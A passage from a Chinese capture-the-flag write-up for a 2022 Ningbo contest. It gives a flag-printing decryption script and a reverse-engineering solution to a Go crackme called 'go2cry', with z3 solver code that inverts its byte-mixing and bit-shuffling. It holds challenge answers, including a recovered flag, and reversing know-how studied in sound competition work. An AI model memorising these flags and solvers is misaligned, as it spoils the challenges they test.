         13, 20, 18, 12, 15, 3, 4, 33, 21, 33, 7, 18, 15, 23, 3, 12, 40, 11, 32, 25, 34, 36, 9, 9, 37, 19, 27, 36, 10,
         30, 14, 14, 10, 34, 6, 31, 27, 11, 9, 29, 40, 5, 20, 35, 26, 29, 21, 31, 19, 8, 1, 4, 37, 39, 25, 12, 20, 17,
         24, 19, 1, 9, 19, 18, 11, 28, 21, 7, 6, 6, 31, 8, 9, 22, 13, 14, 30, 7, 19, 34, 3, 9, 39, 16, 28, 15, 15, 26,
         19, 11, 15, 27, 29, 32, 11, 26, 33, 13, 10, 11, 8, 12, 14, 21, 13, 9, 13, 21, 9, 24, 27, 23, 10, 7, 24, 8, 39,
         8, 30, 21, 37, 20, 30, 26, 2, 17, 29, 22, 8, 31, 16, 8]
cipher = [0x66, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0,
         0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070,
         0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049,
         0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067,
         0x0000005D, 0x00000084]

k = 0
for i in range(0, len(op_num), 5):
   for j in range(4, -1, -1):
       if op_num[i + j] > 9:
           if op_num[i + j] > 19:
               cipher[k] ^= op_num[i + j]
           else:
               cipher[k] -= op_num[i + j]
       else:
           cipher[k] += op_num[i + j]
   k += 1

for i in cipher:
   print(chr(i), end='')

#flag{7dac6284cea9d861034f73df34861ae5}

【7coin】2022宁波市赛WriteUp

Reverse

go2cry

8位一组加密,共计4组

part 1

简单单字节操作

【7coin】2022宁波市赛WriteUp

循环结构如下

for i in range(0, 4, 3)

而后调用math_big___ptr_Int__SetInt64 转为int64

math_big_nat_setBytes转为big-endian

part 2

而后进入异或循环,v14有符号,通过判断符号正负确定是否异或

【7coin】2022宁波市赛WriteUp

part 3

最后进入位操作,看起来很复杂,实际上只是将每个字节按照位序拼接

【7coin】2022宁波市赛WriteUp

化简运算之后

revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]

enc = [0] * 8
for k in range(8):
   for m in range(8):
       enc[k] |= ((ROL(revs[m], 5, 8) >> (7 - k) & 1) * 0x80) >> m
       # if ROL(revs[m], 5, 8) >> (7 - k) & 1:
       #     enc[k] |= 0x80 >> m

print([bin(ROL(i, 5, 8))[2:].zfill(8) for i in revs])
print([bin(i)[2:].zfill(8) for i in enc])

# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']

完整脚本如下


from z3 import *

def ROL(data, shift, size=32):
   shift %= size
   remains = data >> (size - shift)
   body = (data << shift) - (remains << size )
   return body + remains

def ROR(data, shift, size=32):
   shift %= size
   body = data >> shift
   remains = (data << (size - shift)) - (body << size)
   return body + remains

def solves(res):
   sol = Solver()
   raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
   inp = raw.copy()
   for i in range(0, 4, 3):
       v20 = inp[i] ^ inp[i + 2]
       inp[i] = v20

       v19 = v20 ^ inp[i + 2] ^ inp[i + 1]
       inp[i + 1] = v19
       inp[i + 2] ^= v19

   v14 = Concat(*inp)

   for i in range(64):
       v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)

   inp3 = [
              Extract(7, 0, v14),
              Extract(15, 8, v14),
              Extract(23, 16, v14),
              Extract(31, 24, v14),
              Extract(39, 32, v14),
              Extract(47, 40, v14),
              Extract(55, 48, v14),
              Extract(63, 56, v14),
   ]
   temp = [0] * 8
   for i in range(8):
       ch = 0
       for j in range(8):
           ch <<= 1
           ch += res[j] >> (7 - i) & 1
       ch = ROR(ch, 5, 8)
       temp[i] = ch

   for i in range(8):
       sol.add(inp3[i] == temp[i])

   assert sol.check() == sat
   mol = sol.model()
   print(bytearray([mol.eval(i).as_long() for i in raw]))

cmpdata = [0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08, 0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19, 0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF, 0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58]
for i in range(0, len(cmpdata), 8):
   solves(cmpdata[i:i+8])



原文始发于微信公众号(7coinSec):【7coin】2022宁波市赛WriteUp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日01:46:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【7coin】2022宁波市赛WriteUp https://cn-sec.com/archives/1037189.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: